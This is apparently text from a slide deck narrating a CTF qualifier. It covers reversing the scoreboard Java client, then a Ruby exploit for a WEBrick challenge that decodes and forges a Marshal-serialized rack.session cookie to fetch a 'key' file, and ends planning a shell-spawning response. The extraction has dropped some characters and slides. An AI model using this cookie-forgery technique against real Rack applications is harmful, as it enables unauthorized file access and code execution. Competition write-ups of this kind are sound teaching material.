10. The Score Board
● Java applet
● Annoying and slow
● The organisation is late
● Direct openssl connection
doesn't seem to work
11. The Score Board
● Let start reversing with jad
● Class to communicate with the
server:
biz/ddtek/quals/QualsClient.class
● Need to do some patching to
remove UI related instructions
12. The Score Board
● Method to login
● Method to get the matrix of
challenges as an array
● Method to get the details for each
challenge
13. The Score Board
● Build 2 java apps to get score
and to get new challenge
● Build an IRC alert bot for new
challenge
● Fuzz/Try to inject ;)
● And share it with the team
14.
15. Powtent Pownables 300
● Ruby based
● HTTP based:
● Often the case
● No XSS or SQLi
● Just vulnerable and weird web
servers
16. PP300: 2 paths ???
● The version of Webrick seems
vulnerable:
WEBrick/1.3.1 (Ruby/1.8.7/2010-08-16)
● The cookie sent is identical
between 2 HTTP requests
without cookies...
20. How to lose an hour :/
{ "eNpj4YjmUTJTIBbE6+iq6qvWcClZEKtc" =>
"eNpj4YjmUTJTIBbE6+iq6qvWcClZEKtcHUTH6OurxhCjCaYBrElVv0aVsCZ9INQE6wVq
1gXyibEPjj5eH2SXqoaqgoK1goKqJtAmYoNBNUZVB0xxKZkQHXLqurqq6lwAdh80Ag==",
"eNqVlD1uwzAMhZcORQ5REFlqF1A4BujQ" =>
"eNqVlD1uwzAMhZcORQ5REFlqF1A4BujQJccoAdqD4dFDMmQgfPZKlKif=",
"mh7cJ%h99LPn1zSoh4,42!6e3t78Cw]i" =>
"eNpj4VCSySgpKbDS1zc0MtczAEJDK1MjCwNDfQBR/QXBn",
"eNqF0M0KwjAMAOCLB9nZBwjZpB1sy92t" =>
"eNqF0M0KwjAMAOCLB9nZBwjZpB1sy92t0KNP4MVK6hPsBfLwptOON5imtBTY9Sc
5HO8nbGA3mMhWeN7Nz3PQ+CUmHv4ICMyEPwURx2ERnR99twYiBO2JiFGBheDHZXSsgE
CKoCdEH1hy2nKKwcAiKC2tv2RA710tiFhE7Hs0sTzwuSk6F/RY9d3SREKePQavpke
a9e9BUh8CWGAWucqmGxlQqiE4h7VxG6Epm4Fy5htv7zAGtT5dtNJpSvW21QtSqV5v"}
z= Marshal.load(Base64.decode64(URI.decode(cookie)))
21. All values start with eN...
> s="eNpj4YjmUTJTIBbE6+iq6qvWcClZEKtcHUTH6OurxhCjCaYBrElVv0aVsCZ9INQE
6WVq1gXyibEPjj5eH2SXqoaQgoK1goKqJtAmYoNBNUZVB0xxKZkQHXLqurqq6lwAdh80A
g=="
> Base64.decode64(s).each_byte do |c|
> print "x%02x" % c
> end
x78xdax63xe1x88xe6x51x32x53x20x16xc4xebxe8xaaxeaxab
xd6x70x29x59x10xabx5cx1dx44xc7xe8xebxabxc6x10xa3x09
xa6x01xacx49x55xbfx46x95xb0x26x7dx20xd4x04xe9x6bxea
xd6x05xf2x89xb1x0fx8ex3ex5ex1fx64x97xaax86xaax82x82
xb5x82x82xaax26xd0x26x62x83x41x35x46x55x07x4cx71x29
x99x10x1dx72xeaxbaxbaxaaxeax5cx00x76x1fx34x02
… googling for “x78xda” links to
the zlib
22. After few lines of code
z.each do |p,v|
puts
puts Marshal.load(Zlib::Inflate.new.inflate(Base64.decode64(v)))
end
And you get...
23.
24. [ … ]
[ … ]
http://127.0.0.1:52801/
_//(
oo
<_.
__/"
//_`.
,@;@, ||/ )]
;@;@( @;@;@;@;@;@,_|/ / |
/a `@_|@;@;@;@(_____.' |
/ )@:@;@;@;@/@:@;@#|"""|
`--"'`;@;@;@;@|@;@;@`== )
`;@;;@;;@;@` || |
|| | ( __||H|
|| | // / =="#'=
// ( // / |__V_|
''"' '"'___<<____)
If you follow, there were 4 values...
… I removed the goatse...
25. We need to retrieve a file
named “key”...
inte = "mh7cJ%h99LPn1zSoh4,42!6e3t78Cw]i"
url = Marshal.load(Zlib::Inflate.new.inflate(
Base64.decode64(z[inte])))
pp url
url += "key"
zzzz = Zlib::Deflate.new(Zlib::BEST_COMPRESSION)
dst = Base64.encode64(zzzz.deflate(Marshal.dump(url), Zlib::FINISH))
zzzz.close
z[inte] = dst
l = TCPSocket.new( "pwn508.ddtek.biz",52719)
s = "#{URI.encode(Base64.encode64(Marshal.dump(z)))}"
lol = "GET / HTTP/1.0rnCookie: rack.session=#{s}rnrn"
puts lol
l.write lol
puts l.read
And we get...
27. So we need...
● A web server that responds with a Zlib
compressed response that is base64
encoded
● This response should declare a
function that will read a file or spawn a
shell